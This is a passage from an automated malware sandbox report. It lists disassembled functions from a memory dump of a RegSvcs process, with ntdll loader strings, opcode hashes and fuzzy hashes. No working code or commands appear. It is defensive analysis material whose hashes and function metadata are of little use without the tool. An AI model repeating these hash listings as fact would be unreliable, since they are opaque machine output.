                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 0-3154609507
                                                              • Opcode ID: 2f87cb72fec8fa5d708c61dbbf0f6274d5fc7e18c8ce65d3c7eefbb2cf6af616
                                                              • Instruction ID: e6c1565e1e20f6a50ebd16a337b9993ac8a317f6d54e2d2684df811a1e8e1e8f
                                                              • Opcode Fuzzy Hash: 2f87cb72fec8fa5d708c61dbbf0f6274d5fc7e18c8ce65d3c7eefbb2cf6af616
                                                              • Instruction Fuzzy Hash: 2641C172A046519FCB62CE6CDC40A267BE9BF49B90F0E066DED499B359DB30D801CB91
                                                              Function 015A0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-2558761708
                                                              • Opcode ID: a63a6729dfc6857c4b7e1c2c7f23d6260b878a1f80deb7c44ff02a468e0c1d5e
                                                              • Instruction ID: cde7c993a81f93480e6dadb452fbf354d9102a9e1a21cdae6727c3ed7337bbeb
                                                              • Opcode Fuzzy Hash: a63a6729dfc6857c4b7e1c2c7f23d6260b878a1f80deb7c44ff02a468e0c1d5e
                                                              • Instruction Fuzzy Hash: 1D11DC313B41069FDB29DA28C848B6EB3A8FF80A16F18856DF506CF291EB34E841C754
                                                              Function 016120DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01612104
                                                              • LdrpInitializationFailure, xrefs: 016120FA
                                                              • Process initialization failed with status 0x%08lx, xrefs: 016120F3
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2986994758
                                                              • Opcode ID: 3d024ac136c10fb3b156c0fa01b52034fd525324b1302916ca5e04578d2e895a
                                                              • Instruction ID: 82ed088170871627eab7cf2df1020d1b3ee2f87abb402bfa4fa9cc247ef5346e
                                                              • Opcode Fuzzy Hash: 3d024ac136c10fb3b156c0fa01b52034fd525324b1302916ca5e04578d2e895a
                                                              • Instruction Fuzzy Hash: 2EF02234640309BBE724E64DDC53FAA3B68FB40B04F24045CFB006B785D2B0E980C684
                                                              Function 015A03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: #%u
                                                              • API String ID: 48624451-232158463
                                                              • Opcode ID: 60f6b0faa07c47b0d6657a799b9c9f341a7de3d2fe24bb2c6dd8a6ac6c02d17e
                                                              • Instruction ID: caae78899ba3c019b759af512f8b2a7a2d4815e10baaa71677096e014533ce93
                                                              • Opcode Fuzzy Hash: 60f6b0faa07c47b0d6657a799b9c9f341a7de3d2fe24bb2c6dd8a6ac6c02d17e
                                                              • Instruction Fuzzy Hash: 4D715D71A0014ADFDB11DFA8C990BAEB7F8FF48344F144069EA05EB291E634ED41CBA0
                                                              Function 0159A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrResSearchResource Exit, xrefs: 0159AA25
                                                              • LdrResSearchResource Enter, xrefs: 0159AA13
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                              • API String ID: 0-4066393604
                                                              • Opcode ID: ed75efd26afe91f5355411e8a6912c2c24fd5a573488b9fc7d7f0ecb7e0b34c3
                                                              • Instruction ID: 2cc58f759065872adc2c06ce2fbe586920ba84f9b42e685cc1e57b41e3a4897e
                                                              • Opcode Fuzzy Hash: ed75efd26afe91f5355411e8a6912c2c24fd5a573488b9fc7d7f0ecb7e0b34c3
                                                              • Instruction Fuzzy Hash: 90E15171A002199FEF22CE99C984BAEBBBAFF44314F14452AEA11EF251D774D940CB61
                                                              Function 0165A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: `$`
                                                              • API String ID: 0-197956300
                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                              • Instruction ID: 46bf9d5aa0e49a6f98937b1f546f2cef9a9a5bd7f0d1cade37b8c344fc50d197
                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                              • Instruction Fuzzy Hash: D4C1BF312043429BEB65CFA8CC41B6BBBE6BFC4318F084A2DFA968B291D775D505CB51
                                                              Function 0160E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Legacy$UEFI
                                                              • API String ID: 2994545307-634100481
                                                              • Opcode ID: 590b6f9aee0e2498c77b2501a929dcc6e7e03c67939115fc4ac1768e44020e10
                                                              • Instruction ID: 6e3a0a466c9a581836b7d34cadcb67ee424e89d88cf4a286ec762894a8f0b948
                                                              • Opcode Fuzzy Hash: 590b6f9aee0e2498c77b2501a929dcc6e7e03c67939115fc4ac1768e44020e10
                                                              • Instruction Fuzzy Hash: F7614171E046199FDB29DFA8CC40BAEBBB9FB44700F15486EE649EB291D7319901CB50
                                                              Function 016343D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$MUI
                                                              • API String ID: 0-17815947
                                                              • Opcode ID: 4eb0bb5793919812ae047da061cd3b2ceb3e7e444212e009365c807bfa7cb036
                                                              • Instruction ID: 80ee57c2bc3b5ab7a66f3caed0bea8fe952e138b7ac453cd14e9372f070a5047
                                                              • Opcode Fuzzy Hash: 4eb0bb5793919812ae047da061cd3b2ceb3e7e444212e009365c807bfa7cb036
                                                              • Instruction Fuzzy Hash: 12510871E0021EAEDF11DFA9CC90AEEBBB9FB84754F104529E611AB290DB749905CB60
                                                              Function 015904E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • kLsE, xrefs: 01590540
                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0159063D
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                              • API String ID: 0-2547482624
                                                              • Opcode ID: 0b5c8fdca190b570f947a3c5990e41aeb8c6eda46b4814543564f76cf09f7fc5
                                                              • Instruction ID: c045c69b439c6e2276934af09093cb9bf7bfd8ef7f5a5cfb27137e803150397e
                                                              • Opcode Fuzzy Hash: 0b5c8fdca190b570f947a3c5990e41aeb8c6eda46b4814543564f76cf09f7fc5
                                                              • Instruction Fuzzy Hash: AE51B0715047429BDB24DF68C5406ABBBE9BFC4304F104C3EEA9A8B281E734D545CB92
                                                              Function 0159A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0159A309
                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0159A2FB
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                              • API String ID: 0-2876891731
                                                              • Opcode ID: 98e045a751d2da57daed018879231db87a1fdf968a984e93af757a5deafb5ff5
                                                              • Instruction ID: dab72030c4982cf8e8fd713ec913080950cf7c2fe30a1335dd2b963afb0e9e70
                                                              • Opcode Fuzzy Hash: 98e045a751d2da57daed018879231db87a1fdf968a984e93af757a5deafb5ff5
                                                              • Instruction Fuzzy Hash: F7418C71A0464ADBDB11CF59C840B6EBBF4FF84704F1444A9EE00DF295E2B5D940CBA2
                                                              Function 015CA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Cleanup Group$Threadpool!
                                                              • API String ID: 2994545307-4008356553
                                                              • Opcode ID: 063f751863b1a1ee458660fcad87b801983d5d153682114944f51a315432e6d2
                                                              • Instruction ID: 3ea5c3ae1ba7a6773c76e9554682b9610451a4ef26cb1637c3cc331e3a886b8b
                                                              • Opcode Fuzzy Hash: 063f751863b1a1ee458660fcad87b801983d5d153682114944f51a315432e6d2
                                                              • Instruction Fuzzy Hash: A001D1B2654748AFD321DF64CD45B167BE8F784B19F00893DA648CB190F374D844CB46
                                                              Function 0159C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: MUI
                                                              • API String ID: 0-1339004836
                                                              • Opcode ID: ac4f5ed3d8d09c2a5d625e9dc1e004d780641804e4e48da2e032205c201ab9a4
                                                              • Instruction ID: 65ff8d832bff0c4d81e18df79926ba7042df25794d9ae8271257ea0f20f25538
                                                              • Opcode Fuzzy Hash: ac4f5ed3d8d09c2a5d625e9dc1e004d780641804e4e48da2e032205c201ab9a4
                                                              • Instruction Fuzzy Hash: 5F826A75E002198FEF25CFA9C980BEDBBB5BF48310F148169E919AF391D770A941CB52
                                                              Function 01616420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 1581faa1144ada766ce92ca7ef059f960b794cb24c35fe367aea4d1b7510a0f8
                                                              • Instruction ID: e2ddae38a2fe650344882bd47bd052e34b5f0b66d1beaca83b9e28b7337923d6
                                                              • Opcode Fuzzy Hash: 1581faa1144ada766ce92ca7ef059f960b794cb24c35fe367aea4d1b7510a0f8
                                                              • Instruction Fuzzy Hash: 0F916071A4121AAFEB21DF99CC85FAEBBB9FF54750F144065F600AB294D774AD00CBA0
                                                              Function 0163E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 5eac0587ce231e35b948078d0d73e72a3a587bd1f21dff68a00c3df885a7228d
                                                              • Instruction ID: 2730c4c7b9c06213efd93c4554560399c4cecc59d145b692d2bd5312c4f0f446
                                                              • Opcode Fuzzy Hash: 5eac0587ce231e35b948078d0d73e72a3a587bd1f21dff68a00c3df885a7228d
                                                              • Instruction Fuzzy Hash: 1B91803190150ABEEB22AFA5DC44FAFBB79FFC5744F100029F501AB250D7769902CBA0
                                                              Function 015CA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: GlobalTags
                                                              • API String ID: 0-1106856819
                                                              • Opcode ID: 7a33ecc541f95399652535e51796f887c7aa3be0dec58b60b6200a7fa9c335ea
                                                              • Instruction ID: 68a78e46a734cb9974799164a33210d45bf26772d98b073e29884b59d85002a6
                                                              • Opcode Fuzzy Hash: 7a33ecc541f95399652535e51796f887c7aa3be0dec58b60b6200a7fa9c335ea
                                                              • Instruction Fuzzy Hash: 7C714175E0021A9FDF19CF9CD9906AEBBB1BF88710F14812DE505AB381E7719951CB60
                                                              Function 01634978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .mui
                                                              • API String ID: 0-1199573805
                                                              • Opcode ID: cdb59990749f9ca95a40806ca1f91250ce37740cc5162cc548e4677b191b3c47
                                                              • Instruction ID: 51e690ce4e3e2ccb8db6a00189169f56d19f7049c6adb8c69ab9ffba47b8e9f3
                                                              • Opcode Fuzzy Hash: cdb59990749f9ca95a40806ca1f91250ce37740cc5162cc548e4677b191b3c47
                                                              • Instruction Fuzzy Hash: 61518372D0022A9BDF14DF99DC40AAEFBB4BF84650F05416AE911BB354DB749C02CBE4
                                                              Function 015AE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: EXT-
                                                              • API String ID: 0-1948896318
                                                              • Opcode ID: f263eb9b8fa4944cd562b70084cf9e4837507744087c0e2752b84fecd7019f43
                                                              • Instruction ID: db6d926acd5ee29a2f62cf14281278c9dfe8de447f141fbac7dc718867b71fb0
                                                              • Opcode Fuzzy Hash: f263eb9b8fa4944cd562b70084cf9e4837507744087c0e2752b84fecd7019f43
                                                              • Instruction Fuzzy Hash: 2F4181725483429BD710DA79C981B6FBBE8FFC8614F84092DF684DF180E674D904C7A2
                                                              Function 0160C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: BinaryHash
                                                              • API String ID: 0-2202222882
                                                              • Opcode ID: f9f71523bd7147b5f336ce14459495fcf6eb7f3c5e6486ddca83ead7b0f7274d
                                                              • Instruction ID: b4779608049adb8cddab0aeb9425a605efc8c49f28f5041facceb236eae3ab10
                                                              • Opcode Fuzzy Hash: f9f71523bd7147b5f336ce14459495fcf6eb7f3c5e6486ddca83ead7b0f7274d
                                                              • Instruction Fuzzy Hash: F14145B1D0052DABDB21DA54CC84FDFB77DAB45714F0146E5EA08AB180DB709E898F98
                                                              Function 01626B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #
                                                              • API String ID: 0-1885708031
                                                              • Opcode ID: 9f978518afac21f0d57b059d7afb8ee5a0993be762c72ae7c601e2aa28085425
                                                              • Instruction ID: 21783af9cb31f6a3f9a746dfc93ba47b54d53cb79f1a697bc3e310a0d435d6c8
                                                              • Opcode Fuzzy Hash: 9f978518afac21f0d57b059d7afb8ee5a0993be762c72ae7c601e2aa28085425
                                                              • Instruction Fuzzy Hash: 9431E531B00A699AEB22EB69CC50BEE7BA8EF44704F544068ED41AF282D775D815CF50
                                                              Function 0160CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: BinaryName
                                                              • API String ID: 0-215506332
                                                              • Opcode ID: 2c9469abf03b4bcfafef18f3bb5afb03fdf4d24e4490cb0d0bff1083b643deb8
                                                              • Instruction ID: 8d1591ce9ace2496ce715455c37ad7adc111679dc7319c2b03fe24f27390891e
                                                              • Opcode Fuzzy Hash: 2c9469abf03b4bcfafef18f3bb5afb03fdf4d24e4490cb0d0bff1083b643deb8
                                                              • Instruction Fuzzy Hash: F031E536900916AFEB1ADA59CC55E6FBB74FF80710F1142A9E905AB290D730DE04DBE0
                                                              Function 0161892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0161895E
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                              • API String ID: 0-702105204
                                                              • Opcode ID: 8248e92661356623c9f6ab55b7a90bda3e52aac5063590d5937e1a62f61f2c8c
                                                              • Instruction ID: 64b8d1d6ac23d240c278e710413ebece4d8e6be205238496725b71cfed1c5e57
                                                              • Opcode Fuzzy Hash: 8248e92661356623c9f6ab55b7a90bda3e52aac5063590d5937e1a62f61f2c8c
                                                              • Instruction Fuzzy Hash: A901F732610202AFE7346E5D9C94A6A7B6AFFC57A4B0C191CF6421B669CF206881C796
                                                              Function 01632000 Relevance: .8, Instructions: 757COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 39187277d691cd4cb7c4e82ecaffca208e72f57aa55bdbbe96cd81deb39fdddb
                                                              • Instruction ID: f0b8d7cd69eae8425c0673d5410579b29b297d91ca66977e3e5f0fe0d9517c9b
                                                              • Opcode Fuzzy Hash: 39187277d691cd4cb7c4e82ecaffca208e72f57aa55bdbbe96cd81deb39fdddb
                                                              • Instruction Fuzzy Hash: 6942AF316083429BE725CF68CCA0A6BBBE5BFC8700F49492DFA8297350D771D949CB52
                                                              Function 01628158 Relevance: .6, Instructions: 617COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 54e7ce91dabbee860db94c371294d9d7fadc5b9b24868337c764f2554439b833
                                                              • Instruction ID: 3c4ada9ff4a4903a70a9db42a631fad0c9de9f18feb378e6ce65a43c8751c857
                                                              • Opcode Fuzzy Hash: 54e7ce91dabbee860db94c371294d9d7fadc5b9b24868337c764f2554439b833
                                                              • Instruction Fuzzy Hash: 48424D75E006299FEB24CF69CC81BADBBF9BF88300F158199E949EB241D7349985CF50
                                                              Function 015A2840 Relevance: .6, Instructions: 605COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ad3e0d6e0384656a6fb7d03ad1d47bd046be0afc4655712d9e069992395fab8f
                                                              • Instruction ID: 20e116fe8f36b49dba8eb1f8b7fe8b52af07f57fb3636c27c12108de7816792c
                                                              • Opcode Fuzzy Hash: ad3e0d6e0384656a6fb7d03ad1d47bd046be0afc4655712d9e069992395fab8f
                                                              • Instruction Fuzzy Hash: C832DC70A007568FEB25CF69C8547BEBBF2BF84704F24451DE68A9F285DB35A842CB50
                                                              Function 0163A118 Relevance: .6, Instructions: 591COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8bf76c7a83cd4ffa5d1892498ab858c1384ebb42b6b530d0b2763a37b5b09089
                                                              • Instruction ID: 8aaef71b6924779f4fd435707c30a502e69509182f759f1cee77b31ee7ade9d1
                                                              • Opcode Fuzzy Hash: 8bf76c7a83cd4ffa5d1892498ab858c1384ebb42b6b530d0b2763a37b5b09089
                                                              • Instruction Fuzzy Hash: B622BE742046618BEB25CFADC894772BBF1AF85300F08855AE9D6CF386D735E452EB60
                                                              Function 01596A50 Relevance: .5, Instructions: 548COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 58a8d3c3dae2d1d29ee0db5fac2e361c5d1d8c6c3e5787fc762381899c1cf192
                                                              • Instruction ID: 9812f7d706734afa15927172a42ec3b68331e03aa980b5826098f6ec9054a998
                                                              • Opcode Fuzzy Hash: 58a8d3c3dae2d1d29ee0db5fac2e361c5d1d8c6c3e5787fc762381899c1cf192
                                                              • Instruction Fuzzy Hash: E1328B75A00605CFDF25CFA8C880AAEBBF2FF88310F144569EA56AB391D734E845CB51
                                                              Function 015B4A35 Relevance: .4, Instructions: 423COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                              • Instruction ID: fecccd2611f362c14b9f5defd40a7cc6a8d4797a8fcd2b8817c86ddc77684ad4
                                                              • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                              • Instruction Fuzzy Hash: DFF12D71E0021A9FDF25CF99D590AEEBBF5BF48710F048529EA06AF245E774D841CB60
                                                              Function 0162892B Relevance: .4, Instructions: 386COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4650ffbf900f7df5d51169bbe5facf3e32b699c93ed5a414a5720c49956fca17
                                                              • Instruction ID: 1694610eaa3fcbd57f15b1a710079bf895729335d8a18bc0588f716ca09cc3c3
                                                              • Opcode Fuzzy Hash: 4650ffbf900f7df5d51169bbe5facf3e32b699c93ed5a414a5720c49956fca17
                                                              • Instruction Fuzzy Hash: C6D1F271E00A2A8BDF15CF68CC41AFEB7F9BF88304F188169D955A7241D735E9068F60
                                                              Function 015965D0 Relevance: .4, Instructions: 383COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5f8b0b3fb6ccb64d5825ca536856928e66d78dd9117cdc27c12115f223511ff5
                                                              • Instruction ID: 51a62ff285a59cbe19d572b5a8d7a922ecfaff33d3c8de607962444ddff3cc9d
                                                              • Opcode Fuzzy Hash: 5f8b0b3fb6ccb64d5825ca536856928e66d78dd9117cdc27c12115f223511ff5
                                                              • Instruction Fuzzy Hash: 1FE17F71508342CFCB15CF28C590A6EBBE1FF89314F05896DE9998B351EB31E909CB92
                                                              Function 01588397 Relevance: .4, Instructions: 380COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: af7c353b32be1fb83a68e6dcffe7335eab7dad780219f73022a7c8b3cae739f3
